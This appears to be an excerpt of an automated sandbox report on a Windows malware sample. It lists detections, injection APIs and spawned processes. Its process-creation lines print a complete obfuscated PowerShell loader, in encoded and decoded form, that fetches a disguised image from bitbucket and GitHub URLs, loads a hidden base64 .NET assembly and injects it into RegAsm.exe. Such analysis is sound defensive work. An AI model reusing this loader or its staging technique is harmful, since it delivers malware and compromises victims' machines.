                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: amsi64_7664.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7476, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7664, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8044, type: MEMORYSTR
                  .NET source code references suspicious native API functions
                  Source: 6.2.powershell.exe.116a6201750.0.raw.unpack, Program.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
                  Source: 6.2.powershell.exe.116a6201750.0.raw.unpack, Program.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
                  Source: 6.2.powershell.exe.116a6201750.0.raw.unpack, Program.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
                  Source: 6.2.powershell.exe.116a6201750.0.raw.unpack, Program.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num3, length, 12288, 64)
                  Source: 6.2.powershell.exe.116a6201750.0.raw.unpack, Program.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, payload, bufferSize, ref bytesRead)
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F7C008Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fqt.vbs" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#CJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.52liw/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$codigo = 'wwbo#gu#d##u#fm#zqby#hy#aqbj#gu#u#bv#gk#bgb0#e0#yqbu#ge#zwbl#hi#xq#6#do#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b##g#d0#i#bb#e4#zqb0#c4#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b#bu#hk#c#bl#f0#og#6#fq#b#bz#de#mg#n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgb1#g4#ywb0#gk#bwbu#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i#b7#c##c#bh#hi#yqbt#c##k#bb#hm#d#by#gk#bgbn#fs#xqbd#cq#b#bp#g4#awbz#ck#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#b3#gu#ygbd#gw#aqbl#g4#d##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#c##pq#g#ec#zqb0#c0#ugbh#g4#z#bv#g0#i##t#ek#bgbw#hu#d#bp#gi#agbl#gm#d##g#cq#b#bp#g4#awbz#c##lqbd#g8#dqbu#hq#i##k#gw#aqbu#gs#cw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgbv#hi#zqbh#gm#a##g#cg#j#bs#gk#bgbr#c##aqbu#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#ck#i#b7#c##d#by#hk#i#b7#c##cgbl#hq#dqby#g4#i##k#hc#zqbi#em#b#bp#gu#bgb0#c4#r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#k##k#gw#aqbu#gs#kq#g#h0#i#bj#ge#d#bj#gg#i#b7#c##ywbv#g4#d#bp#g4#dqbl#c##fq#g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i#by#gu#d#b1#hi#bg#g#cq#bgb1#gw#b##g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gw#aqbu#gs#cw#g#d0#i#b##cg#jwbo#hq#d#bw#hm#og#v#c8#ygbp#hq#ygb1#gm#awbl#hq#lgbv#hi#zw#v#hm#a#bp#gu#b#bk#ge#z#bh#hm#lwbn#hm#z#bn#gg#agbq#c8#z#bv#hc#bgbs#g8#yqbk#hm#lwbp#g0#zwbf#hq#zqbz#hq#lgbq#h##zw#/#de#mq#4#de#mq#3#dm#nq#n#cw#i##n#gg#d#b0#h##cw#6#c8#lwby#ge#dw#u#gc#aqb0#gg#dqbi#hu#cwbl#hi#ywbv#g4#d#bl#g4#d##u#gm#bwbt#c8#cwbh#g4#d#bv#g0#yqbs#g8#lwbh#hu#z#bp#hq#lwbt#ge#aqbu#c8#aqbt#gc#xwb0#gu#cwb0#c4#agbw#gc#pw#x#dq#n##0#de#nw#y#dm#jw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##j#bp#g0#yqbn#gu#qgb5#hq#zqbz#c##pq#g#eq#bwb3#g4#b#bv#ge#z#be#ge#d#bh#ey#cgbv#g0#t#bp#g4#awbz#c##j#bs#gk#bgbr#hm#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i#bp#gy#i##o#cq#aqbt#ge#zwbl#ei#eqb0#gu#cw#g#c0#bgbl#c##j#bu#hu#b#bs#ck#i#b7#c##j#bp#g0#yqbn#gu#v#bl#hg#d##g#d0#i#bb#fm#eqbz#hq#zqbt#c4#v#bl#hg#d##u#eu#bgbj#g8#z#bp#g4#zwbd#do#ogbv#fq#rg#4#c4#rwbl#hq#uwb0#hi#aqbu#gc#k##k#gk#bqbh#gc#zqbc#hk#d#bl#hm#kq#7##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##g#cq#cwb0#ge#cgb0#ey#b#bh#gc#i##9#c##jw#8#dw#qgbb#fm#rq#2#dq#xwbt#fq#qqbs#fq#pg#+#cc#ow#g#cq#zqbu#gq#rgbs#ge#zw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#eu#tgbe#d4#pg#n#ds#i##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##9#c##j#bp#g0#yqbn#gu#v#bl#hg#d##u#ek#bgbk#gu#e#bp#gy#k##k#hm#d#bh#hi#d#bg#gw#yqbn#ck#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gu#bgbk#ek#bgbk#gu#e##g#d0#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c4#sqbu#gq#zqb4#e8#zg#o#cq#zqbu#gq#rgbs#ge#zw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##aqbm#c##k##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##t#gc#zq#g#d##i##t#ge#bgbk#c##j#bl#g4#z#bj#g4#z#bl#hg#i##t#gc#d##g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##p#c##ew#g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#cs#pq#g#cq#cwb0#ge#cgb0#ey#b#bh#gc#lgbm#gu#bgbn#hq#a##7#c##dq#k#c
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('testpowershell.home'); $method = $type.getmethod('la').invoke($null, [object[]] ('txt.52liw/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -exec
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$codigo = 'wwbo#gu#d##u#fm#zqby#hy#aqbj#gu#u#bv#gk#bgb0#e0#yqbu#ge#zwbl#hi#xq#6#do#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b##g#d0#i#bb#e4#zqb0#c4#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b#bu#hk#c#bl#f0#og#6#fq#b#bz#de#mg#n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgb1#g4#ywb0#gk#bwbu#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i#b7#c##c#bh#hi#yqbt#c##k#bb#hm#d#by#gk#bgbn#fs#xqbd#cq#b#bp#g4#awbz#ck#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#b3#gu#ygbd#gw#aqbl#g4#d##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#c##pq#g#ec#zqb0#c0#ugbh#g4#z#bv#g0#i##t#ek#bgbw#hu#d#bp#gi#agbl#gm#d##g#cq#b#bp#g4#awbz#c##lqbd#g8#dqbu#hq#i##k#gw#aqbu#gs#cw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgbv#hi#zqbh#gm#a##g#cg#j#bs#gk#bgbr#c##aqbu#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#ck#i#b7#c##d#by#hk#i#b7#c##cgbl#hq#dqby#g4#i##k#hc#zqbi#em#b#bp#gu#bgb0#c4#r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#k##k#gw#aqbu#gs#kq#g#h0#i#bj#ge#d#bj#gg#i#b7#c##ywbv#g4#d#bp#g4#dqbl#c##fq#g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i#by#gu#d#b1#hi#bg#g#cq#bgb1#gw#b##g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gw#aqbu#gs#cw#g#d0#i#b##cg#jwbo#hq#d#bw#hm#og#v#c8#ygbp#hq#ygb1#gm#awbl#hq#lgbv#hi#zw#v#hm#a#bp#gu#b#bk#ge#z#bh#hm#lwbn#hm#z#bn#gg#agbq#c8#z#bv#hc#bgbs#g8#yqbk#hm#lwbp#g0#zwbf#hq#zqbz#hq#lgbq#h##zw#/#de#mq#4#de#mq#3#dm#nq#n#cw#i##n#gg#d#b0#h##cw#6#c8#lwby#ge#dw#u#gc#aqb0#gg#dqbi#hu#cwbl#hi#ywbv#g4#d#bl#g4#d##u#gm#bwbt#c8#cwbh#g4#d#bv#g0#yqbs#g8#lwbh#hu#z#bp#hq#lwbt#ge#aqbu#c8#aqbt#gc#xwb0#gu#cwb0#c4#agbw#gc#pw#x#dq#n##0#de#nw#y#dm#jw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##j#bp#g0#yqbn#gu#qgb5#hq#zqbz#c##pq#g#eq#bwb3#g4#b#bv#ge#z#be#ge#d#bh#ey#cgbv#g0#t#bp#g4#awbz#c##j#bs#gk#bgbr#hm#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i#bp#gy#i##o#cq#aqbt#ge#zwbl#ei#eqb0#gu#cw#g#c0#bgbl#c##j#bu#hu#b#bs#ck#i#b7#c##j#bp#g0#yqbn#gu#v#bl#hg#d##g#d0#i#bb#fm#eqbz#hq#zqbt#c4#v#bl#hg#d##u#eu#bgbj#g8#z#bp#g4#zwbd#do#ogbv#fq#rg#4#c4#rwbl#hq#uwb0#hi#aqbu#gc#k##k#gk#bqbh#gc#zqbc#hk#d#bl#hm#kq#7##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##g#cq#cwb0#ge#cgb0#ey#b#bh#gc#i##9#c##jw#8#dw#qgbb#fm#rq#2#dq#xwbt#fq#qqbs#fq#pg#+#cc#ow#g#cq#zqbu#gq#rgbs#ge#zw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#eu#tgbe#d4#pg#n#ds#i##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##9#c##j#bp#g0#yqbn#gu#v#bl#hg#d##u#ek#bgbk#gu#e#bp#gy#k##k#hm#d#bh#hi#d#bg#gw#yqbn#ck#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gu#bgbk#ek#bgbk#gu#e##g#d0#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c4#sqbu#gq#zqb4#e8#zg#o#cq#zqbu#gq#rgbs#ge#zw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##aqbm#c##k##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##t#gc#zq#g#d##i##t#ge#bgbk#c##j#bl#g4#z#bj#g4#z#bl#hg#i##t#gc#d##g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##p#c##ew#g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#cs#pq#g#cq#cwb0#ge#cgb0#ey#b#bh#gc#lgbm#gu#bgbn#hq#a##7#c##dq#k#cJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('testpowershell.home'); $method = $type.getmethod('la').invoke($null, [object[]] ('txt.52liw/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD11CC LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,0_2_00007FF7D6FD11CC
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
